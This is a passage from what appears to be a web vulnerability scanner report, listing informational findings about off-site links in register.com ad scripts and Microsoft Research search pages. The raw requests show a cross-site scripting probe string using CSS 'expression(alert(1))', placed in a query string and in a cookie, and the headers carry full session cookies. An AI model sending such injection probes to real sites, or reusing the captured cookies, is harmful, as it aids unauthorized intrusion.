<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/816192881/x60/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.20. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3?

The response contains the following links to other domains:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
https://view.atdmt.com/00F/view/201823109/direct;wi.720;hi.300/01/

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3? HTTP/1.1
Host: oascentral.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/unauthenticated_session_expired.rcmx?opener=/favicon.icod8565
Cookie: TLTSID=E7F82DE2D67410D60DB8F7326230B644; mbox=session#1315085812182-148030#1315089817|PC#1315085812182-148030.19#1317679958|check#true#1315088017; OAX=Mhd7ak5indMAAU0C; NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.6.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:12:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 5683
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4045525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/263208940/Bottom/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1465521702/Position1/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
ister/Vistaprint720x300SessionTimeout_Q32011/Vistaprint720x300SessionTimeoutQ22011.html/4d686437616b35696e644d4141553043?http://clk.atdmt.com/00F/go/201823109/direct;wi.720;hi.300/01/" target="_blank"><img src="https://view.atdmt.com/00F/view/201823109/direct;wi.720;hi.300/01/" border="0" ></a>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1767429174/Position3/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/6384475/x50/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1506366249/x51/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/359876546/x52/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/160147008/x53/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/540277461/x54/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/907473222/x55/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1456909597/x56/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1092388200/x57/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1153674280/x58/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1665091991/x59/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/525916737/x60/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.21. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3?

The response contains the following links to other domains:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
https://view.atdmt.com/00F/view/201823109/direct;wi.720;hi.300/01/

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/unauthenticated_session_expired.rcmx?opener=/domain/searchresults.rcmx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; OAX=Mhd7ak5inIsACxRd; NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315085400638-452340#1315089100|PC#1315085400638-452340.19#1317679240|check#true#1315087300

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:00:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 5684
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4045525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/348150587/Bottom/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/132743578/Position1/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
ister/Vistaprint720x300SessionTimeout_Q32011/Vistaprint720x300SessionTimeoutQ22011.html/4d686437616b35696e49734143785264?http://clk.atdmt.com/00F/go/201823109/direct;wi.720;hi.300/01/" target="_blank"><img src="https://view.atdmt.com/00F/view/201823109/direct;wi.720;hi.300/01/" border="0" ></a>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/534122813/Position3/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/2352069/x50/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1321826992/x51/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/889950020/x52/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1332177151/x53/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1479901092/x54/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1079475209/x55/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/219129756/x56/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1748184258/x57/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/1963787035/x58/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/581059897/x59/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/newsessiontimeoutpage/2081042694/x60/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.22. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom?

The response contains the following links to other domains:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
http://users.partnercommerce.com/z/10820/CD42/
https://ad.doubleclick.net/ad/N553.register.com/B5118552.25;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1673054765?
https://ad.doubleclick.net/adj/N553.register.com/B5118552.25;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=1673054765?
https://ad.doubleclick.net/jump/N553.register.com/B5118552.25;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1673054765?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:30:51 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=Mhd7ak5inIsACxRd; expires=Tue, 03-Sep-13 21:30:51 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11391
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write (' \n');
docume
...[SNIP]...
</script>');
}
if (position == 'Position1') {
document.write ('<a href="http://users.partnercommerce.com/z/10820/CD42/" target="_blank"><img src="https://www.register.com/images/adbanner/texting_ly_031011_468x60.gif" alt="Reach your customers with text messages" border="0">
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/348898858/x50/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/698058262/x51/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="https://ad.doubleclick.net/adj/N553.register.com/B5118552.25;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=1673054765?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="https://ad.doubleclick.net/jump/N553.register.com/B5118552.25;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1673054765?">\n');
document.write ('<IMG SRC="https://ad.doubleclick.net/ad/N553.register.com/B5118552.25;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1673054765?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/1711302033/x53/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/821938813/x54/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/763824159/x55/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/1748637866/x56/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/700910573/x57/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/468858684/x58/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/813404819/x59/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/viewproductdetail/getadomain/550224650/x60/default/empty.gif/4d686437616b35696e49734143785264?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

17.23. http://research.microsoft.com/Search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/Search

Issue detail

The page was loaded from a URL containing a query string:

http://research.microsoft.com/Search?query=xss

The response contains the following links to other domains:

http://msnportalbetarmc.112.2o7.net/b/ss/msnportalbetarmc/1/H.1--NS/0
http://stj.msn.com/br/om/js/s_code.js

Request

GET /Search?query=xss HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; s_cc=true; s_sq=%5B%5BB%5D%5D; SH=xss.cx sqli httpi dork ghdb bhdb||xss||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:04:16 GMT
Content-Length: 59520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
<noscript>
<img src=http://msnportalbetarmc.112.2O7.net/b/ss/msnportalbetarmc/1/H.1--NS/0 height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

17.24. http://research.microsoft.com/apps/dp/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/search.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0

The response contains the following links to other domains:

http://msnportalbetarmc.112.2o7.net/b/ss/msnportalbetarmc/1/H.1--NS/0
http://stj.msn.com/br/om/js/s_code.js

Request

GET /apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0 HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
